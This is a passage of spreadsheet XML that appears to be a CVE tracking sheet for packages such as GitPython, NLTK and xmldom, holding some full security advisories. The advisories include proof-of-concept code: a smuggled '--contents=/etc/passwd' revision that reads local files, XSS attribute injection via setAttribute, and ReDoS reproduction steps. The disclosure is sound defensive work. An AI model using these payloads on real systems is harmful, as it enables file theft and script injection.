t="inlineStr" /><c r="M1599" s="5" t="inlineStr" /><c r="N1599" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1599" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1599" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1599" s="5" t="inlineStr" /><c r="R1599" s="5" t="inlineStr" /><c r="S1599" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1599" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-7809</t></is></c></row><row r="1600"><c r="A1600" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1600" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1600" s="5" t="inlineStr"><is><t>CVE-2026-78675</t></is></c><c r="D1600" s="5" t="inlineStr" /><c r="E1600" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1600" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1600" s="5" t="inlineStr" /><c r="H1600" s="5" t="n"><v>0.001</v></c><c r="I1600" s="5" t="inlineStr" /><c r="J1600" s="5" t="inlineStr" /><c r="K1600" s="5" t="inlineStr" /><c r="L1600" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1600" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1600" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1600" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1600" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1600" s="5" t="inlineStr" /><c r="R1600" s="5" t="inlineStr" /><c r="S1600" s="5" t="inlineStr"><is><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is></c><c r="T1600" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78675</t></is></c></row><row r="1601"><c r="A1601" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1601" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1601" s="5" t="inlineStr"><is><t>CVE-2026-78676</t></is></c><c r="D1601" s="5" t="inlineStr" /><c r="E1601" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1601" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1601" s="5" t="inlineStr" /><c r="H1601" s="5" t="n"><v>0.004</v></c><c r="I1601" s="5" t="inlineStr" /><c r="J1601" s="5" t="inlineStr" /><c r="K1601" s="5" t="inlineStr" /><c r="L1601" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1601" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1601" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1601" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1601" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1601" s="5" t="inlineStr" /><c r="R1601" s="5" t="inlineStr" /><c r="S1601" s="5" t="inlineStr"><is><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is></c><c r="T1601" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78676</t></is></c></row><row r="1602"><c r="A1602" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1602" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1602" s="5" t="inlineStr"><is><t>CVE-2026-78677</t></is></c><c r="D1602" s="5" t="inlineStr" /><c r="E1602" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1602" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1602" s="5" t="inlineStr" /><c r="H1602" s="5" t="n"><v>0.004</v></c><c r="I1602" s="5" t="inlineStr" /><c r="J1602" s="5" t="inlineStr" /><c r="K1602" s="5" t="inlineStr" /><c r="L1602" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1602" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1602" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1602" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1602" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1602" s="5" t="inlineStr" /><c r="R1602" s="5" t="inlineStr" /><c r="S1602" s="5" t="inlineStr"><is><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is></c><c r="T1602" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78677</t></is></c></row><row r="1603"><c r="A1603" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1603" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1603" s="5" t="inlineStr"><is><t>CVE-2026-78678</t></is></c><c r="D1603" s="5" t="inlineStr" /><c r="E1603" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1603" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1603" s="5" t="inlineStr" /><c r="H1603" s="5" t="n"><v>0.002</v></c><c r="I1603" s="5" t="inlineStr" /><c r="J1603" s="5" t="inlineStr" /><c r="K1603" s="5" t="inlineStr" /><c r="L1603" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1603" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1603" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1603" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1603" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1603" s="5" t="inlineStr" /><c r="R1603" s="5" t="inlineStr" /><c r="S1603" s="5" t="inlineStr"><is><t>## Summary
`Repo.blame()` / `Repo.blame_incremental()` guard forwarded revision options against `unsafe_git_revision_options`, but that denylist only contains the file-WRITE options `--output`/`-o`. `git blame` also honors `--contents &lt;file&gt;` and `-S &lt;file&gt;`, which cause the file's lines to be echoed into the blame result — an arbitrary file READ. Neither option is in the denylist, so a caller-influenced revision value of `--contents=&lt;path&gt;` passes the guard and leaks file contents. This is a distinct sink-option and impact class (READ) from GHSA-956x-8gvw-wg5v (which addressed the blame `--output` WRITE), directly analogous to GHSA-539m-9xh6-q6rr (archive READ gap accepted separately from the archive write/exec advisory).

## Root Cause
`unsafe_git_revision_options = ["--output","-o"]` (`git/repo/base.py:188`). The `rev` string is passed to `_option_candidates([rev], kwargs)` and placed BEFORE the `--` separator (base.py:841). The canonical name of `--contents=...` is `contents`, which is not on the denylist, so no `UnsafeOptionError` is raised. The trailing `--` protects only the pathspec, not the option before the revision.

## Impact
Arbitrary local file read at the privileges of the host process; the file's line contents appear in the blame result returned to the caller. Pure VALUE control (the caller forwards a user-influenced revision string). Default `allow_unsafe_options=False`.

## Proof of Concept
```python
result = repo.blame("--contents=/etc/passwd", "a.txt")
# result rows carry the victim file's line text
```

## Attack Chain
1. Entry: app calls `repo.blame(rev, file)` with attacker `rev="--contents=/etc/passwd"` (or kwarg `contents="/etc/passwd"`, or `-S`).
2. Check: `Git.check_unsafe_options(_option_candidates([rev,...], kwargs), unsafe_git_revision_options)` @ base.py:841. Guard: denylist = `["--output","-o"]` only. Bypass proof: canonical name `contents` ∉ denylist → no error.
3. Sink: `self.git.blame(rev, "--", file, p=True, ...)`. argv (observed): `['git','blame','-p','--contents=&lt;secret&gt;','HEAD','--','a.txt']`.
4. Impact: blame result rows carry the victim file's line text.

## Bypass Evidence
Independently reproduced (independent test harness, default `allow_unsafe_options=False`): `blame('--contents=&lt;secret&gt;','a.txt')` → guard PASSED; result rows = `['GATE_SECRET_LINE_A','GATE_SECRET_LINE_B']`. Control: `blame('--output=…')` still BLOCKED (guard active on this path). `-S` kwarg argv also reaches git unguarded.

## Affected Versions
`GitPython &lt;= 3.1.58` (denylist present verbatim on the latest release tag).

## Suggested Fix
Prefer an allowlist of blame options; at minimum add `--contents`/`-S` (and any other path-taking blame options) to `unsafe_git_revision_options`, and make the membership rule "the option takes a filesystem path" rather than "the option writes output".

---
Reported by **zx (Jace)** — GitHub: @manus-use</t></is></c><c r="T1603" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78678</t></is></c></row><row r="1604"><c r="A1604" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1604" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1604" s="5" t="inlineStr"><is><t>CVE-2026-78679</t></is></c><c r="D1604" s="5" t="inlineStr" /><c r="E1604" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1604" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1604" s="5" t="inlineStr" /><c r="H1604" s="5" t="n"><v>0.002</v></c><c r="I1604" s="5" t="inlineStr" /><c r="J1604" s="5" t="inlineStr" /><c r="K1604" s="5" t="inlineStr" /><c r="L1604" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1604" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1604" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1604" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1604" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1604" s="5" t="inlineStr" /><c r="R1604" s="5" t="inlineStr" /><c r="S1604" s="5" t="inlineStr"><is><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is></c><c r="T1604" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78679</t></is></c></row><row r="1605"><c r="A1605" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1605" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1605" s="5" t="inlineStr"><is><t>CVE-2026-78681</t></is></c><c r="D1605" s="5" t="inlineStr" /><c r="E1605" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1605" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1605" s="5" t="inlineStr" /><c r="H1605" s="5" t="n"><v>0.003</v></c><c r="I1605" s="5" t="inlineStr" /><c r="J1605" s="5" t="inlineStr" /><c r="K1605" s="5" t="inlineStr" /><c r="L1605" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1605" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1605" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1605" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1605" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1605" s="5" t="inlineStr" /><c r="R1605" s="5" t="inlineStr" /><c r="S1605" s="5" t="inlineStr"><is><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is></c><c r="T1605" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78681</t></is></c></row><row r="1606"><c r="A1606" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1606" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1606" s="5" t="inlineStr"><is><t>CVE-2026-78682</t></is></c><c r="D1606" s="5" t="inlineStr" /><c r="E1606" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1606" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1606" s="5" t="inlineStr" /><c r="H1606" s="5" t="n"><v>0.003</v></c><c r="I1606" s="5" t="inlineStr" /><c r="J1606" s="5" t="inlineStr" /><c r="K1606" s="5" t="inlineStr" /><c r="L1606" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1606" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1606" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1606" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1606" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1606" s="5" t="inlineStr" /><c r="R1606" s="5" t="inlineStr" /><c r="S1606" s="5" t="inlineStr"><is><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is></c><c r="T1606" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78682</t></is></c></row><row r="1607"><c r="A1607" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1607" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1607" s="5" t="inlineStr"><is><t>CVE-2026-78683</t></is></c><c r="D1607" s="5" t="inlineStr" /><c r="E1607" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1607" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1607" s="5" t="inlineStr" /><c r="H1607" s="5" t="n"><v>0.003</v></c><c r="I1607" s="5" t="inlineStr" /><c r="J1607" s="5" t="inlineStr" /><c r="K1607" s="5" t="inlineStr" /><c r="L1607" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1607" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1607" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1607" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1607" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1607" s="5" t="inlineStr" /><c r="R1607" s="5" t="inlineStr" /><c r="S1607" s="5" t="inlineStr"><is><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is></c><c r="T1607" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78683</t></is></c></row><row r="1608"><c r="A1608" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1608" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1608" s="5" t="inlineStr"><is><t>CVE-2026-79657</t></is></c><c r="D1608" s="5" t="inlineStr" /><c r="E1608" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1608" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1608" s="5" t="inlineStr" /><c r="H1608" s="5" t="n"><v>0.012</v></c><c r="I1608" s="5" t="inlineStr" /><c r="J1608" s="5" t="inlineStr" /><c r="K1608" s="5" t="inlineStr" /><c r="L1608" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1608" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1608" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1608" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1608" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1608" s="5" t="inlineStr" /><c r="R1608" s="5" t="inlineStr" /><c r="S1608" s="5" t="inlineStr"><is><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is></c><c r="T1608" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79657</t></is></c></row><row r="1609"><c r="A1609" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1609" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1609" s="5" t="inlineStr"><is><t>CVE-2026-79674</t></is></c><c r="D1609" s="5" t="inlineStr" /><c r="E1609" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1609" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1609" s="5" t="inlineStr" /><c r="H1609" s="5" t="n"><v>0.002</v></c><c r="I1609" s="5" t="inlineStr" /><c r="J1609" s="5" t="inlineStr" /><c r="K1609" s="5" t="inlineStr" /><c r="L1609" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1609" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1609" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1609" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1609" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1609" s="5" t="inlineStr" /><c r="R1609" s="5" t="inlineStr" /><c r="S1609" s="5" t="inlineStr"><is><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is></c><c r="T1609" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79674</t></is></c></row><row r="1610"><c r="A1610" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1610" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1610" s="5" t="inlineStr"><is><t>CVE-2026-79676</t></is></c><c r="D1610" s="5" t="inlineStr" /><c r="E1610" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1610" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1610" s="5" t="inlineStr" /><c r="H1610" s="5" t="n"><v>0.003</v></c><c r="I1610" s="5" t="inlineStr" /><c r="J1610" s="5" t="inlineStr" /><c r="K1610" s="5" t="inlineStr" /><c r="L1610" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1610" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1610" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1610" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1610" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1610" s="5" t="inlineStr" /><c r="R1610" s="5" t="inlineStr" /><c r="S1610" s="5" t="inlineStr"><is><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is></c><c r="T1610" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79676</t></is></c></row><row r="1611"><c r="A1611" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1611" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1611" s="5" t="inlineStr"><is><t>CVE-2026-80205</t></is></c><c r="D1611" s="5" t="inlineStr" /><c r="E1611" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1611" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1611" s="5" t="inlineStr" /><c r="H1611" s="5" t="n"><v>0.005</v></c><c r="I1611" s="5" t="inlineStr" /><c r="J1611" s="5" t="inlineStr" /><c r="K1611" s="5" t="inlineStr" /><c r="L1611" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1611" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1611" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1611" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1611" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1611" s="5" t="inlineStr" /><c r="R1611" s="5" t="inlineStr" /><c r="S1611" s="5" t="inlineStr"><is><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is></c><c r="T1611" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80205</t></is></c></row><row r="1612"><c r="A1612" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1612" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1612" s="5" t="inlineStr"><is><t>CVE-2026-80206</t></is></c><c r="D1612" s="5" t="inlineStr" /><c r="E1612" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1612" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1612" s="5" t="inlineStr" /><c r="H1612" s="5" t="n"><v>0.003</v></c><c r="I1612" s="5" t="inlineStr" /><c r="J1612" s="5" t="inlineStr" /><c r="K1612" s="5" t="inlineStr" /><c r="L1612" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1612" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1612" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1612" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1612" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1612" s="5" t="inlineStr" /><c r="R1612" s="5" t="inlineStr" /><c r="S1612" s="5" t="inlineStr"><is><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is></c><c r="T1612" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80206</t></is></c></row><row r="1613"><c r="A1613" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1613" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1613" s="5" t="inlineStr"><is><t>CVE-2026-81725</t></is></c><c r="D1613" s="5" t="inlineStr" /><c r="E1613" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1613" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1613" s="5" t="inlineStr" /><c r="H1613" s="5" t="n"><v>0.002</v></c><c r="I1613" s="5" t="inlineStr" /><c r="J1613" s="5" t="inlineStr" /><c r="K1613" s="5" t="inlineStr" /><c r="L1613" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1613" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1613" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1613" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1613" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1613" s="5" t="inlineStr" /><c r="R1613" s="5" t="inlineStr" /><c r="S1613" s="5" t="inlineStr"><is><t>### Summary

`Pl196xCorpusReader` still parses whole TEI blocks with multiple lazy regexes over attacker-controlled text. A malformed file with many opening tags and no matching closing tags forces repeated rescans and produces quadratic CPU growth in public reader APIs.

### Details

- **Vulnerability type:** Regular-expression denial of service
- **Affected component:** `nltk.corpus.reader.pl196x.TEICorpusView.read_block` and `Pl196xCorpusReader` public methods
- **Affected versions:** Published `3.9.4` and current source `v3.10.0-rc2` both reproduced.
- **Patched versions:** Not yet patched
- **Root cause:** Lazy `.*?` whole-block regexes rescan untrusted XML-like blocks from each opening-tag position.

The parser uses regexes for paragraphs, sentences, and word tags across the whole `&lt;text&gt;` block. When the attacker supplies many unmatched opening tags, each attempt scans toward the end of the block and fails, then restarts from the next opening tag. There is near four-times runtime growth each time the number of malformed `&lt;p&gt;` tags doubled, through normal public calls such as `words()` and `tagged_words()`.

### PoC

**Preconditions**
- The application parses attacker-influenced PL196X or TEI-like corpus files through public reader APIs.

**Steps**
1. Create a corpus file with a valid header followed by a `&lt;text&gt;` block that contains many opening tags and no matching closing tags.
2. Instantiate `Pl196xCorpusReader` on that corpus.
3. Call `words()` or `tagged_words()` and measure elapsed time as the malformed tag count doubles.
4. Observe near quadratic growth instead of near-linear behavior.

**Minimal reproducible excerpt**

```text
size=1000 0.014s
size=2000 0.057s
size=4000 0.231s
size=8000 0.927s
```

### Impact

A consumer that accepts attacker-influenced corpus files can be forced into heavy CPU use and parser-thread stalling before the application concludes the input contains no valid content.

### Remediation

Replace the whole-block lazy-regex parser with a linear parser or bounded tokenizer, and add regression tests that assert near-linear behavior on malformed inputs with many unmatched tags.</t></is></c><c r="T1613" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81725</t></is></c></row><row r="1614"><c r="A1614" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1614" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1614" s="5" t="inlineStr"><is><t>CVE-2026-82333</t></is></c><c r="D1614" s="5" t="inlineStr" /><c r="E1614" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1614" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1614" s="5" t="inlineStr" /><c r="H1614" s="5" t="n"><v>0.003</v></c><c r="I1614" s="5" t="inlineStr" /><c r="J1614" s="5" t="inlineStr" /><c r="K1614" s="5" t="inlineStr" /><c r="L1614" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M1614" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N1614" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1614" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1614" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1614" s="5" t="inlineStr" /><c r="R1614" s="5" t="inlineStr" /><c r="S1614" s="5" t="inlineStr"><is><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is></c><c r="T1614" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82333</t></is></c></row><row r="1615"><c r="A1615" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1615" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1615" s="5" t="inlineStr"><is><t>CVE-2026-82514</t></is></c><c r="D1615" s="5" t="inlineStr" /><c r="E1615" s="5" t="inlineStr" /><c r="F1615" s="5" t="inlineStr" /><c r="G1615" s="5" t="inlineStr" /><c r="H1615" s="5" t="inlineStr" /><c r="I1615" s="5" t="inlineStr" /><c r="J1615" s="5" t="inlineStr" /><c r="K1615" s="5" t="inlineStr" /><c r="L1615" s="5" t="inlineStr" /><c r="M1615" s="5" t="inlineStr" /><c r="N1615" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1615" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1615" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1615" s="5" t="inlineStr" /><c r="R1615" s="5" t="inlineStr" /><c r="S1615" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1615" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82514</t></is></c></row><row r="1616"><c r="A1616" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1616" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1616" s="5" t="inlineStr"><is><t>CVE-2026-83605</t></is></c><c r="D1616" s="5" t="inlineStr" /><c r="E1616" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1616" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1616" s="5" t="inlineStr" /><c r="H1616" s="5" t="n"><v>0.003</v></c><c r="I1616" s="5" t="inlineStr" /><c r="J1616" s="5" t="inlineStr" /><c r="K1616" s="5" t="inlineStr" /><c r="L1616" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1616" s="5" t="inlineStr"><is><t>0.8.14, 0.9.11</t></is></c><c r="N1616" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1616" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1616" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1616" s="5" t="inlineStr" /><c r="R1616" s="5" t="inlineStr" /><c r="S1616" s="5" t="inlineStr"><is><t>## Summary

`Element.setAttribute()` in `@xmldom/xmldom` bypasses attribute name validation by calling the private `_createAttribute(name)` method, which performs no validation. The public `createAttribute()` method correctly validates names against an anchored `QName` pattern, but `setAttribute()` never uses it. The serializer escapes attribute *values* but trusts attribute *names*, allowing an attacker to inject additional attributes (including event handlers) into serialized output. The `requireWellFormed: true` option did not catch this.

## Details

`Element.setAttribute(name, value)` creates attribute nodes by calling the private `_createAttribute(name)` method, which performs no validation on the `name` parameter. In contrast, the public `Document.createAttribute(name)` method validates the name against the `QName` production before creating the attribute node.

The result is a two-tier validation system where the most commonly used API (`setAttribute`) takes the unvalidated path:

- `doc.createAttribute("bad name")` — throws `INVALID_CHARACTER_ERR` (correct).
- `el.setAttribute("bad name", "value")` — succeeds silently (vulnerable).

The serializer emits attribute names verbatim into the output. Because attribute values ARE escaped (quotes, ampersands, etc.), the injection must occur through the name. An attacker can terminate the current attribute and inject new ones by including quote and space characters in the attribute name.

### Root Cause

1. `setAttribute()` calls `_createAttribute()` (private, no validation) instead of `createAttribute()` (public, validates against `QName`).
2. The serializer trusts attribute names and emits them unescaped.
3. The serializer's `requireWellFormed` code path did not validate attribute names during serialization.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();
const doc = impl.createDocument(null, 'root', null);

// The attribute name contains a closing quote, a space, and a new attribute
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// &lt;root class="safe" onclick="alert(1)"/&gt;
//
// The single setAttribute() call produced TWO attributes:
//   1. class="safe"
//   2. onclick="alert(1)"
//
// requireWellFormed: true did NOT prevent the injection.
```

### Demonstrating the validation gap

```js
// Public createAttribute correctly rejects invalid names:
try {
  doc.createAttribute('class="safe" onclick');
} catch (e) {
  console.log('createAttribute rejects:', e.message);
}

// But setAttribute (which uses _createAttribute) accepts the same input:
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');
// No error thrown
```

## Impact

Applications that use `setAttribute()` with any user-controlled portion of the attribute name are vulnerable to attribute injection attacks. This includes:

- **Cross-Site Scripting (XSS)**: Injecting event handler attributes into HTML output consumed by browsers.
- **Security attribute override**: Overriding security-relevant attributes such as `integrity`, `nonce`, `sandbox`, or `Content-Security-Policy` meta attributes.
- **Validation bypass**: The public `createAttribute()` API validates while `setAttribute()` does not, creating an inconsistent security boundary that developers cannot rely on.
- **requireWellFormed bypass**: Applications that adopted `requireWellFormed: true` as a mitigation for prior CVEs remained vulnerable.

`@xmldom/xmldom` can also be used inside browsers, where it mirrors the DOM API. Unlike the browser's `setAttribute()`, which rejects an invalid attribute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serialized attribute's qualified name against the XML `QName` production and throws `InvalidStateError` before emitting it. This covers ordinary attribute names **and** synthesized `xmlns:PREFIX` namespace declarations (the namespace-prefix sub-vector).

Fixed under `requireWellFormed: true` in `@xmldom/xmldom` **0.9.11** and **0.8.14**. Default serialization is unchanged.

### PoC — fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const doc = new DOMImplementation().createDocument(null, 'root', null);
doc.documentElement.setAttribute('class="safe" onclick', 'alert(1)');

// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc));
// &lt;root class="safe" onclick="alert(1)"/&gt;

// Opt-in guard: throws InvalidStateError before serializing
try {
  new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: The attribute name "class="safe" onclick" is not a valid XML QName
}
```

### Why the default stays verbatim

